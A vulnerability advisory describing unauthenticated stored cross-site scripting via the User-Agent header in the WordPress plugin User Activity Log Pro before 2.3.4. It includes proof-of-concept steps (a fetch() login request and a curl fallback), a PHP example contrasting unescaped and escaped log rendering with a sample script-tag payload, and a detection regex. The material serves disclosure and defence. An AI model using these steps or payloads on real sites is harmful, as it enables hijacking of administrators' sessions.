wpvulndb | Bartlomiej Marek | WPVDB-ID: 78EA6FE0-5FAC-4923-949C-023C85FE2437
Sep 25, 2023 - 12:00 a.m.

User Activity Log Pro < 2.3.4 - Unauthenticated Stored Cross-Site Scripting via User Agent

2023-09-25 00:00:00
Bartlomiej Marek
wpscan.com
plugin vulnerabilities
cross-site scripting
security exploit

EPSS: 0.001
Percentile: 20.8%

Description

The plugin does not escape the recorded User-Agent strings when it renders the user activity log dashboard. Because any unauthenticated visitor can set an arbitrary User-Agent on a login attempt, a visitor can store an HTML/JavaScript payload that executes in the browser of the administrator who later views the log page (stored Cross-Site Scripting).

PoC

  1. Make sure the plugin's Enable User Agent For Log setting is enabled at /wp-admin/admin.php?page=ualp_settings.
  2. If you are logged in to the site, log out.
  3. While still on the site, send the following fetch() call from the browser's console. The XSS payload belongs in the User-Agent header value; the copy of the PoC on this page shows only a plain Firefox User-Agent string there.

     await fetch("/wp-login.php", {
       "credentials": "include",
       "headers": {
         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0",
         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
         "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
         "Content-Type": "application/x-www-form-urlencoded",
         "Upgrade-Insecure-Requests": "1"
       },
       "referrer": "http://vulnerable-site.tld/wp-login.php",
       "body": "log=simpleadmin&pwd=invalidpassword&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1",
       "method": "POST",
       "mode": "cors"
     });

     If the browser refuses to override User-Agent from fetch(), send the same POST with curl -A '<payload>' instead; the plugin records whatever User-Agent reaches it, and the login does not need to succeed.
  4. Log back in as an administrator and open the user logs at /wp-admin/admin.php?page=ual_pro. An alert box indicates the attack succeeded.
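The bug class behind this advisory, shown as an added example that is not the plugin's own code: a stored User-Agent is concatenated straight into the dashboard HTML, and the fix is to escape every untrusted value for the HTML context it lands in (WordPress's esc_html()). The stand-in esc_html(), the row layout, the column names and the sample rows are all constructed for this example; the third row is the kind of value the PoC above plants. The triage helper at the end is the check a responder would run over the existing log table after upgrading, since rows planted before the patch keep their payload.

```php
<?php
// Added example, not code from User Activity Log Pro. Models the advisory's
// bug (unescaped User-Agent in the admin log dashboard) beside the fixed
// rendering. Function and column names are hypothetical.

declare(strict_types=1);

// Stand-in for WordPress's esc_html() so this runs outside WordPress.
// Inside a plugin, call the real esc_html().
if (!function_exists('esc_html')) {
    function esc_html(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// Constructed sample of what a login-activity log stores per attempt.
// The third row is what an unauthenticated visitor can plant via the PoC.
$rows = [
    ['user' => 'admin',       'ip' => '203.0.113.5',  'user_agent' => 'Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0'],
    ['user' => 'editor',      'ip' => '198.51.100.7', 'user_agent' => 'curl/8.1.2'],
    ['user' => 'simpleadmin', 'ip' => '192.0.2.9',    'user_agent' => 'Mozilla/5.0 <script>alert(document.domain)</script>'],
];

// Vulnerable pattern: raw stored value concatenated into the page, so any
// markup in the User-Agent becomes part of the admin's DOM.
function render_row_vulnerable(array $row): string
{
    return '<tr><td>' . $row['user'] . '</td>'
         . '<td>' . $row['ip'] . '</td>'
         . '<td>' . $row['user_agent'] . '</td></tr>';
}

// Fixed pattern: escape on output. The username is escaped too, because on a
// failed login it is also whatever the visitor typed into the form.
function render_row_fixed(array $row): string
{
    return '<tr><td>' . esc_html($row['user']) . '</td>'
         . '<td>' . esc_html($row['ip']) . '</td>'
         . '<td>' . esc_html($row['user_agent']) . '</td></tr>';
}

// Triage helper: flag stored User-Agents carrying HTML or script markers.
// Legitimate User-Agents contain none of these characters.
function suspicious_user_agent(string $ua): bool
{
    return (bool) preg_match('/[<>"\']|javascript:|\bon[a-z]+\s*=/i', $ua);
}

foreach ($rows as $row) {
    echo "vulnerable: " . render_row_vulnerable($row) . "\n";
    echo "fixed:      " . render_row_fixed($row) . "\n";
    if (suspicious_user_agent($row['user_agent'])) {
        echo "  !! suspicious User-Agent from {$row['ip']} (user '{$row['user']}')\n";
    }
}
```

Run it with `php example.php`. The vulnerable line for the third row contains a live `<script>` element; the fixed line renders `&lt;script&gt;...` as inert text. Stripping tags at storage time (for example with sanitize_text_field()) is not a substitute for escaping at output: it only addresses one HTML context, and it does nothing for rows that were stored before the change.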

